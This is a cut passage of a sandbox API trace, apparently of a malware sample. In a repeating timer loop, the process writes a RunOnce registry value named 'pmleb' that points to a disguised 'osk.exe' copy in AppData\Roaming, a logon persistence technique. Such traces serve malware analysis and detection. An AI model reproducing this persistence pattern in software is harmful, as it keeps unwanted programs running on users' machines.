[0084.355] KillTimer (hWnd=0x20280, uIDEvent=0x2166) returned 1 [0084.356] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0084.356] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.356] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.356] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.357] RegCloseKey (hKey=0x280) returned 0x0 [0084.357] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.357] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.357] SetTimer (hWnd=0x20280, nIDEvent=0x2167, uElapse=0xa, lpTimerFunc=0x0) returned 0x2167 [0084.357] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.371] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.371] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.371] KillTimer (hWnd=0x20280, uIDEvent=0x2167) returned 1 [0084.371] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.371] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.372] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.372] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.372] RegCloseKey (hKey=0x280) returned 0x0 
[0084.372] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.372] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.372] SetTimer (hWnd=0x20280, nIDEvent=0x2168, uElapse=0xa, lpTimerFunc=0x0) returned 0x2168 [0084.372] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.386] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.386] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.386] KillTimer (hWnd=0x20280, uIDEvent=0x2168) returned 1 [0084.387] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.387] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.387] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.387] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.388] RegCloseKey (hKey=0x280) returned 0x0 [0084.388] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.388] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.388] SetTimer (hWnd=0x20280, nIDEvent=0x2169, uElapse=0xa, lpTimerFunc=0x0) returned 0x2169 [0084.388] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.402] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.402] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.402] KillTimer (hWnd=0x20280, uIDEvent=0x2169) returned 1 [0084.402] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.403] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.403] 
RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.403] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.403] RegCloseKey (hKey=0x280) returned 0x0 [0084.403] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.403] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.403] SetTimer (hWnd=0x20280, nIDEvent=0x216a, uElapse=0xa, lpTimerFunc=0x0) returned 0x216a [0084.403] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.418] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.418] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.418] KillTimer (hWnd=0x20280, uIDEvent=0x216a) returned 1 [0084.418] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.419] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.419] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.419] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.419] RegCloseKey (hKey=0x280) returned 0x0 [0084.419] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.419] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.419] SetTimer (hWnd=0x20280, nIDEvent=0x216b, uElapse=0xa, lpTimerFunc=0x0) returned 0x216b [0084.419] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.435] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.435] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.435] KillTimer (hWnd=0x20280, uIDEvent=0x216b) returned 1 [0084.435] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.435] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.435] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.436] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.436] RegCloseKey (hKey=0x280) returned 0x0 [0084.436] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.436] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.436] SetTimer (hWnd=0x20280, nIDEvent=0x216c, uElapse=0xa, lpTimerFunc=0x0) returned 0x216c [0084.436] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.448] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.448] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.449] KillTimer (hWnd=0x20280, uIDEvent=0x216c) returned 1 [0084.449] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.449] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.449] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.449] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.450] RegCloseKey (hKey=0x280) returned 0x0 [0084.450] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.450] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.450] SetTimer (hWnd=0x20280, nIDEvent=0x216d, uElapse=0xa, lpTimerFunc=0x0) returned 0x216d [0084.450] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.464] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.464] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.464] KillTimer (hWnd=0x20280, uIDEvent=0x216d) returned 1 [0084.464] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.465] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.465] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.465] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.465] RegCloseKey (hKey=0x280) returned 0x0 [0084.465] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.465] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0084.465] SetTimer (hWnd=0x20280, nIDEvent=0x216e, uElapse=0xa, lpTimerFunc=0x0) returned 0x216e [0084.465] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.486] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.486] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.487] KillTimer (hWnd=0x20280, uIDEvent=0x216e) returned 1 [0084.487] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.487] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.488] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.488] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.488] RegCloseKey (hKey=0x280) returned 0x0 [0084.488] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.488] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.488] SetTimer (hWnd=0x20280, nIDEvent=0x216f, uElapse=0xa, lpTimerFunc=0x0) returned 0x216f [0084.488] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.495] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.495] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.495] KillTimer (hWnd=0x20280, uIDEvent=0x216f) returned 1 [0084.496] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.496] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.496] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, 
dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.496] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.496] RegCloseKey (hKey=0x280) returned 0x0 [0084.496] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.497] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.497] SetTimer (hWnd=0x20280, nIDEvent=0x2170, uElapse=0xa, lpTimerFunc=0x0) returned 0x2170 [0084.497] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.511] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.511] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.511] KillTimer (hWnd=0x20280, uIDEvent=0x2170) returned 1 [0084.511] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.511] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.511] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.512] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.512] RegCloseKey (hKey=0x280) returned 0x0 [0084.512] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.512] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.512] SetTimer (hWnd=0x20280, nIDEvent=0x2171, uElapse=0xa, lpTimerFunc=0x0) returned 0x2171 
[0084.512] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.527] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.527] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.527] KillTimer (hWnd=0x20280, uIDEvent=0x2171) returned 1 [0084.527] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.528] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.528] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.528] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.528] RegCloseKey (hKey=0x280) returned 0x0 [0084.528] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.528] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.528] SetTimer (hWnd=0x20280, nIDEvent=0x2172, uElapse=0xa, lpTimerFunc=0x0) returned 0x2172 [0084.529] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.542] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.542] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.542] KillTimer (hWnd=0x20280, uIDEvent=0x2172) returned 1 [0084.542] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.543] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.543] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 
phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.543] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.543] RegCloseKey (hKey=0x280) returned 0x0 [0084.543] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.543] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.543] SetTimer (hWnd=0x20280, nIDEvent=0x2173, uElapse=0xa, lpTimerFunc=0x0) returned 0x2173 [0084.543] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.569] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.569] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.569] KillTimer (hWnd=0x20280, uIDEvent=0x2173) returned 1 [0084.569] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.570] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.570] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.570] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.570] RegCloseKey (hKey=0x280) returned 0x0 [0084.570] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.570] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.570] SetTimer (hWnd=0x20280, nIDEvent=0x2174, uElapse=0xa, lpTimerFunc=0x0) returned 0x2174 [0084.570] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0084.573] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.573] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.573] KillTimer (hWnd=0x20280, uIDEvent=0x2174) returned 1 [0084.573] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.574] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.574] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.574] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.574] RegCloseKey (hKey=0x280) returned 0x0 [0084.574] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.574] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.574] SetTimer (hWnd=0x20280, nIDEvent=0x2175, uElapse=0xa, lpTimerFunc=0x0) returned 0x2175 [0084.574] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.589] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.589] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.589] KillTimer (hWnd=0x20280, uIDEvent=0x2175) returned 1 [0084.590] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.590] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.590] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.590] RegSetValueExA (in: 
hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.591] RegCloseKey (hKey=0x280) returned 0x0 [0084.591] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.591] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.591] SetTimer (hWnd=0x20280, nIDEvent=0x2176, uElapse=0xa, lpTimerFunc=0x0) returned 0x2176 [0084.591] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.604] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.604] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.605] KillTimer (hWnd=0x20280, uIDEvent=0x2176) returned 1 [0084.605] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.605] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.605] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.606] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.606] RegCloseKey (hKey=0x280) returned 0x0 [0084.606] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.606] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.606] SetTimer (hWnd=0x20280, nIDEvent=0x2177, uElapse=0xa, lpTimerFunc=0x0) returned 0x2177 [0084.606] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.620] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.620] 
DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.620] KillTimer (hWnd=0x20280, uIDEvent=0x2177) returned 1 [0084.620] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.621] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.621] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.621] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.621] RegCloseKey (hKey=0x280) returned 0x0 [0084.621] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.621] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.621] SetTimer (hWnd=0x20280, nIDEvent=0x2178, uElapse=0xa, lpTimerFunc=0x0) returned 0x2178 [0084.622] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.636] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.636] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.637] KillTimer (hWnd=0x20280, uIDEvent=0x2178) returned 1 [0084.637] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.637] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.637] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.638] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS 
